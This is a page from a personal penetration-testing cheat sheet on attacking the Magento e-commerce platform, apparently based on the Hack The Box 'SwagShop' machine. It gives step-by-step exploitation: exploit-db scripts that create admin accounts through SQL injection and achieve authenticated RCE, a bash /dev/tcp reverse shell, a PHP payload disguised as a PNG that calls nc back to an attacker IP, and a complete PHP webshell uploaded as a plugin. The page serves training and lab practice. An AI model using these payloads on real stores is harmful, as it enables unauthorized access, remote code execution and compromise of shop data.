Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Magento CMS
  • Scan
  • Create Admin
  • Authenticated RCE 37811
  • Upload IDE
  • Froghopper Attack (RCE)
  • Upload Evil Plugin

Was this helpful?

  1. 04 WebApps

Magento

PreviousLocal File Inclusion (LFI)NextNagios

Last updated 2 years ago

Was this helpful?

Magento CMS

  • https://magento.com

  • Magento is an open-source e-commerce platform written in PHP

Scan

  • Magescan

  • Find Version, Files, Etc (local.xml might have passwords)

  • Find the Admin page: http://10.x.x.x/index.php/admin

> php magescan.phar scan:all 10.x.x.x

Create Admin

  • RCE 37977

  • Magento eCommerce- Remote code Execution-37977.py

  • Will create admin creds using a sql injection

searchsploit magento
Magento eCommerce- Remote code Execution-37977.py
vi 37977.py
target = http://10.x.x.x/
target_url = target + "/index.php/admin/CmsWysiwyg/directive/index/"

python 37977.py
http://swagshop.htb/index.php/admin/ 
Gives us Admin credentials!!
forme:forme

Authenticated RCE 37811

  • Must have Admin User/Pass for this to work

  • Must have install_date from '/app/etc/local.xml'

  • Lots of tweaks and errors to get this to work

-------------------
Authenticated RCE: 37811.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution

vi 37811.py
username='forme'
password='forme'
install_date='Wed, 08 May 2019...'      ..from local.xml

-------------------
Errors:
ippsec used path to admin page to help:
python exec.py http://10.x.x.x/index.php/admin/ 'whoami' 

-------------------
Other bloggers updated:
userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwdone = br.find_control(name="login[password]", nr=0)
pwdone.value = password

-------------------
More errors, had to update: from 72 > 2y
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
                                                 /\
-------------------
python 37811.py http://$IP "whoami"                     ..error
python 37811.py http://$IP/index.php/admin/ "whoami"    ..better
python 37811.py http://$IP/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.x.x.x/9001 0>&1'"

nc -nvlp 5555
whoami
www-data

Upload IDE

  • Requires Admin login

  • System > Magento Connect > Magento Connection Manager > Upload

---------------
http://$IP/index.php/admin/ 
Login with Admin

System > Magento Connect > Magento Connection Manager

Check Box: Put store on the maintenance mode while installing
Direct Package File Upload > Browse
Magpleasure_Filesystem-1.0.0.tgz
Upload!
nload:
http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz

---------------
System > Filesystem > IDE
Edit "Cron.php" 
Update it with an evil php webshell

Get your shell
http://10.x.x.x/cron.php

Submit a python reverse shell
nc -nvlp 4444
whoami
www-data

Froghopper Attack (RCE)

  • Requires Admin login

  • Upload an evil png with shellcode

  • Enable Symlinks

  • Edit Newsletter to call the payload

http://swagshop.htb/index.php/admin/ 
Login with Admin

-------------------
Create evil png

echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png

-------------------
System > Configuration > Advanced > Developer > Template Settings
Allow Symlinks: "Yes"

-------------------
Catalog > Manage
New Category > Manage Categories > Categories > Catalog
Thumbnail Image: Browse "shell.php.png"
http://10.x.x.x/media/catalog/category/shell.php.png   ..confirm it worked!

-------------------
Newsletter > Edit Newsletter Template
Add our code block to the "Template Content"
Save Template
Preview Template (to execute)
{{block type=’core/template’ template=’../../../../../../media/catalog/category/shell.php.png’}}

-------------------
Open template to execute the 'symlink' pointed to the evil-png

nc -nvlp 4444
whoami
www-data

Upload Evil Plugin

  • Requires Admin login

  • MAGento plugins are basically php file zipped.

  • Did not work for swagshopHTB

http://$IP/magmi/web/magmi.php
http://$IP/index.php/admin/Cms_Wysiwyg/directive/index/
http://$IP/index.php/admin/Cms_Wysiwyg/directive/key/905d7.../

-------------------
vi evil.php

<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
	  <input type='text' name='command' value=''/>
	  <input type='submit' value='execute'/>
	  </form>";

	if(function_exists('shell_exec')) {
	$command=$_POST['command'];
	$output = shell_exec("$command");
	echo "<pre>$output</pre>";
   }
}
else {
  echo "<form action='evil.php' method='post'>
	  <input type='text' name='command' value=''/>
	  <input type='submit' value='execute'/>
	  </form>";
}
?>

-------------------
> zip evil.zip evil.php

Upload new plugins:
click on "choose file" > evil.zip
 
-------------------
Execute:
http://10.x.x.x/magmi/plugins/evil.php

Download:

Zip an evil and upload it as a Plugin

https://magento.com/blog/magento-news/magento-community-edition-1.9.1-now-available-download
https://docs.magento.com/m1/ce/user_guide/configuration/url-admin-custom.html
https://github.com/steverobbins/magescan
https://joshuasuren.medium.com/hack-the-box-swagshop-write-up-18-1c18fecf885a
Magpleasure_Filesystem-1.0.0.tgz
https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper
php